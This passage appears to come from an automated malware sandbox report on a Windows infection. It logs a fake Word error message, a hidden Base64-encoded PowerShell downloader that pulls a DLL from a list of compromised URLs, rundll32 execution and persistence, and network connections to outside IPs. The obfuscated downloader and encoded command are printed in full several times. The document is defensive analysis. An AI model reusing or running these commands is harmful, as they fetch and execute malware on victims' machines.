Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: powershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformation
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 7_2_10003D55 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exeMemory protected: page execute read | page guard

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 69.49.88.46 80
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 71.72.196.159 80
Encrypted powershell cmdline option foundShow sources
Source: unknownProcess created: Base64 decoded $0e2tk=[tyPe]("{2}{1}{0}{3}{4}"-f'I','m.','SystE','o.Di','reCTory'); set-itEM vAriabLE:wd8 ( [TyPe]("{1}{2}{0}{3}{4}" -f'VIcEPOiNtMana','SySt','eM.NEt.seR','g','Er')) ;$ErrorActionPreference = (('Sile'+'n')+('tlyCo'+'n')+'t'+('in'+'ue'));$N3176cr=$Q25U + [char](64) + $V96R;$C_1Q=('M9'+'5I'); ( VarIABLe 0E2tK ).vaLUE::"crEATeD`IReC`TORY"($HOME + ((('BJlWd'+'d')+('uy2'+'mB')+'J'+('lTmc'+'1')+('k'+'uo')+'BJ'+'l')."RE`p`LacE"(('B'+'Jl'),'\')));$N73P=('K'+('0'+'3V')); $WD8::"s`E`cURitYPrOToc`ol" = ('Tl'+('s'+'12'));$W_5K=(('T'+'88')+'J');$Iyqxv9_ = (('J7'+'0')+'H');$L12K=('Y0'+'3C');$Ojihnwg=$HOME+((('QLOWdd'+'u'+'y2')+'m'+('QL'+'O')+'Tm'+('c'+'1ku')+('oQL'+'O'))."R`ePla`ce"(([char]81+[char]76+[char]79),'\'))+$Iyqxv9_+(('.'+'dl')+'l');$A09L=('X'+('68'+'K'));$X4_1q8q=('w]'+'xm'+('[v'+'s://'+'shul')+'o'+('v'+'baa'+'zar.com')+'/'+'c'+('/'+'bcL6/')+('@'+'w]xm')+('[v'+'s')+':/'+('/m'+'yb')+('us'+'i')+('ness'+'e'+'ven')+('t'+'.com')+('/ti'+'ki')+('-'+'in')+('sta'+'l'+'l'+'/e/@')+('w]xm'+'[v'+':')+('//u'+'hk'+'.cn')+('cr'+'anes')+'.c'+('o'+'m/')+('E'+'rr')+'o'+('r'+'Pages')+'/3'+'/'+'@'+('w]xm'+'[vs')+':/'+'/'+'ca'+'p'+('tur'+'e'+'theac')+'ti'+'o'+'n'+'.'+('com.'+'au')+('/'+'wp-'+'inc')+'lu'+'d'+('es'+'/Y')+'jp'+('/@'+'w]'+'xm[vs:'+'//th')+'en'+('e'+'tw'+'ork'+'er.c')+('a'+'/c')+'om'+'me'+'nt'+'/'+'8'+'N4'+'/'+'@'+'w'+(']xm'+'[v')+('s:'+'/')+('/'+'tr')+('a'+'yonlin')+'e'+'g'+'h.'+('co'+'m/'+'cgi-bi')+('n'+'/HBP'+'R/@')+'w]'+'xm'+('[v'+'://mmo'+'.')+('m'+'ar')+'ti'+('npollo'+'
Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $0e2tk=[tyPe]("{2}{1}{0}{3}{4}"-f'I','m.','SystE','o.Di','reCTory'); set-itEM vAriabLE:wd8 ( [TyPe]("{1}{2}{0}{3}{4}" -f'VIcEPOiNtMana','SySt','eM.NEt.seR','g','Er')) ;$ErrorActionPreference = (('Sile'+'n')+('tlyCo'+'n')+'t'+('in'+'ue'));$N3176cr=$Q25U + [char](64) + $V96R;$C_1Q=('M9'+'5I'); ( VarIABLe 0E2tK ).vaLUE::"crEATeD`IReC`TORY"($HOME + ((('BJlWd'+'d')+('uy2'+'mB')+'J'+('lTmc'+'1')+('k'+'uo')+'BJ'+'l')."RE`p`LacE"(('B'+'Jl'),'\')));$N73P=('K'+('0'+'3V')); $WD8::"s`E`cURitYPrOToc`ol" = ('Tl'+('s'+'12'));$W_5K=(('T'+'88')+'J');$Iyqxv9_ = (('J7'+'0')+'H');$L12K=('Y0'+'3C');$Ojihnwg=$HOME+((('QLOWdd'+'u'+'y2')+'m'+('QL'+'O')+'Tm'+('c'+'1ku')+('oQL'+'O'))."R`ePla`ce"(([char]81+[char]76+[char]79),'\'))+$Iyqxv9_+(('.'+'dl')+'l');$A09L=('X'+('68'+'K'));$X4_1q8q=('w]'+'xm'+('[v'+'s://'+'shul')+'o'+('v'+'baa'+'zar.com')+'/'+'c'+('/'+'bcL6/')+('@'+'w]xm')+('[v'+'s')+':/'+('/m'+'yb')+('us'+'i')+('ness'+'e'+'ven')+('t'+'.com')+('/ti'+'ki')+('-'+'in')+('sta'+'l'+'l'+'/e/@')+('w]xm'+'[v'+':')+('//u'+'hk'+'.cn')+('cr'+'anes')+'.c'+('o'+'m/')+('E'+'rr')+'o'+('r'+'Pages')+'/3'+'/'+'@'+('w]xm'+'[vs')+':/'+'/'+'ca'+'p'+('tur'+'e'+'theac')+'ti'+'o'+'n'+'.'+('com.'+'au')+('/'+'wp-'+'inc')+'lu'+'d'+('es'+'/Y')+'jp'+('/@'+'w]'+'xm[vs:'+'//th')+'en'+('e'+'tw'+'ork'+'er.c')+('a'+'/c')+'om'+'me'+'nt'+'/'+'8'+'N4'+'/'+'@'+'w'+(']xm'+'[v')+('s:'+'/')+('/'+'tr')+('a'+'yonlin')+'e'+'g'+'h.'+('co'+'m/'+'cgi-bi')+('n'+'/HBP'+'R/@')+'w]'+'xm'+('[v'+'://mmo'+'.')+('m'+'ar')+'ti'+('npollo'+'
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\msg.exe msg user /v Word experienced an error trying to open the file.
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: C:\Windows\System32\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rundll32.exe' C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Qafsungwqhhv\abffsuupeze.glo',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Hqmvwbjvtszlkw\wwuzivduoqkxt.pxe',ShowDialogA
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Aanys\cokk.vuq',ShowDialogA
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIA
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD JAAwAGUAMgB0AGsAPQBbAHQAeQBQAGUAXQAoACIAewAyAH0AewAxAH0AewAwAH0AewAzAH0AewA0AH0AIgAtAGYAJwBJACcALAAnAG0ALgAnACwAJwBTAHkAcwB0AEUAJwAsACcAbwAuAEQAaQAnACwAJwByAGUAQwBUAG8AcgB5ACcAKQA7ACAAcwBlAHQALQBpAHQARQBNACAAIAB2AEEAcgBpAGEAYgBMAEUAOgB3AGQAOAAgACAAKAAgAFsAVAB5AFAAZQBdACgAIgB7ADEAfQB7ADIAfQB7ADAAfQB7ADMAfQB7ADQAfQAiACAALQBmACcAVgBJAGMARQBQAE8AaQBOAHQATQBhAG4AYQAnACwAJwBTAHkAUwB0ACcALAAnAGUATQAuAE4ARQB0AC4AcwBlAFIAJwAsACcAZwAnACwAJwBFAHIAJwApACkAIAA7ACQARQByAHIAbwByAEEAYwB0AGkAbwBuAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA9ACAAKAAoACcAUwBpAGwAZQAnACsAJwBuACcAKQArACgAJwB0AGwAeQBDAG8AJwArACcAbgAnACkAKwAnAHQAJwArACgAJwBpAG4AJwArACcAdQBlACcAKQApADsAJABOADMAMQA3ADYAYwByAD0AJABRADIANQBVACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABWADkANgBSADsAJABDAF8AMQBRAD0AKAAnAE0AOQAnACsAJwA1AEkAJwApADsAIAAgACgAIAAgAFYAYQByAEkAQQBCAEwAZQAgACAAMABFADIAdABLACAAKQAuAHYAYQBMAFUARQA6ADoAIgBjAHIARQBBAFQAZQBEAGAASQBSAGUAQwBgAFQATwBSAFkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAEIASgBsAFcAZAAnACsAJwBkACcAKQArACgAJwB1AHkAMgAnACsAJwBtAEIAJwApACsAJwBKACcAKwAoACcAbABUAG0AYwAnACsAJwAxACcAKQArACgAJwBrACcAKwAnAHUAbwAnACkAKwAnAEIASgAnACsAJwBsACcAKQAuACIAUgBFAGAAcABgAEwAYQBjAEUAIgAoACgAJwBCACcAKwAnAEoAbAAnACkALAAnAFwAJwApACkAKQA7ACQATgA3ADMAUAA9ACgAJwBLACcAKwAoACcAMAAnACsAJwAzAFYAJwApACkAOwAgACQAVwBEADgAOgA6ACIAcwBgAEUAYABjAFUAUgBpAHQAWQBQAHIATwBUAG8AYwBgAG8AbAAiACAAPQAgACgAJwBUAGwAJwArACgAJwBzACcAKwAnADEAMgAnACkAKQA7ACQAVwBfADUASwA9ACgAKAAnAFQAJwArACcAOAA4ACcAKQArACcASgAnACkAOwAkAEkAeQBxAHgAdgA5AF8AIAA9ACAAKAAoACcASgA3ACcAKwAnADAAJwApACsAJwBIACcAKQA7ACQATAAxADIASwA9ACgAJwBZADAAJwArACcAMwBDACcAKQA7ACQATwBqAGkAaABuAHcAZwA9ACQASABPAE0ARQArACgAKAAoACcAUQBMAE8AVwBkAGQAJwArACcAdQAnACsAJwB5ADIAJwApACsAJwBtACcAKwAoACcAUQBMACcAKwAnAE8AJwApACsAJwBUAG0AJwArACgAJwBjACcAKwAnADEAawB1ACcAKQArACgAJwBvAFEATAAnACsAJwBPACcAKQApAC4AIgBSAGAAZQBQAGwAYQBgAGMAZQAiACgAKABbAGMAaABhAHIAXQA4ADEAKwBbAGMAaABhAHIAXQA3ADYAKwBbAGMAaABhAHIAXQA3ADkAKQAsACcAXAAnACkAKQArACQASQB5AHEAeAB2ADkAXwArACgAKAAnAC4AJwArACcAZABsACcAKQArACcAbAAnACkAOwAkAEEAMAA5AEwAPQAoACcAWAAnACsAKAAnADYAOAAnACsAJwBLACcAKQApADsAJABYADQAXwAxAHEAOABxAD0AKAAnAHcAXQAnACsAJwB4AG0AJwArACgAJwBbAHYAJwArACcAcwA6AC8ALwAnACsAJwBzAGgAdQBsACcAKQArACcAbwAnACsAKAAnAHYAJwArACcAYgBhAGEAJwArACcAegBhAHIALgBjAG8AbQAnACkAKwAnAC8AJwArACcAYwAnACsAKAAnAC8AJwArACcAYgBjAEwANgAvACcAKQArACgAJwBAACcAKwAnAHcAXQB4AG0AJwApACsAKAAnAFsAdgAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwBtACcAKwAnAHkAYgAnACkAKwAoACcAdQBzACcAKwAnAGkAJwApACsAKAAnAG4AZQBzAHMAJwArACcAZQAnACsAJwB2AGUAbgAnACkAKwAoACcAdAAnACsAJwAuAGMAbwBtACcAKQArACgAJwAvAHQAaQAnACsAJwBrAGkAJwApACsAKAAnAC0AJwArACcAaQBuACcAKQArACgAJwBzAHQAYQAnACsAJwBsACcAKwAnAGwAJwArACcALwBlAC8AQAAnACkAKwAoACcAdwBdAHgAbQAnACsAJwBbAHYAJwArACcAOgAnACkAKwAoACcALwAvAHUAJwArACcAaABrACcAKwAnAC4AYwBuACcAKQArACgAJwBjAHIAJwArACcAYQBuAGUAcwAnACkAKwAnAC4AYwAnACsAKAAnAG8AJwArACcAbQAvACcAKQArACgAJwBFACcAKwAnAHIAcgAnACkAKwAnAG8AJwArACgAJwByACcAKwAnAFAAYQBnAGUAcwAnACkAKwAnAC8AM
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
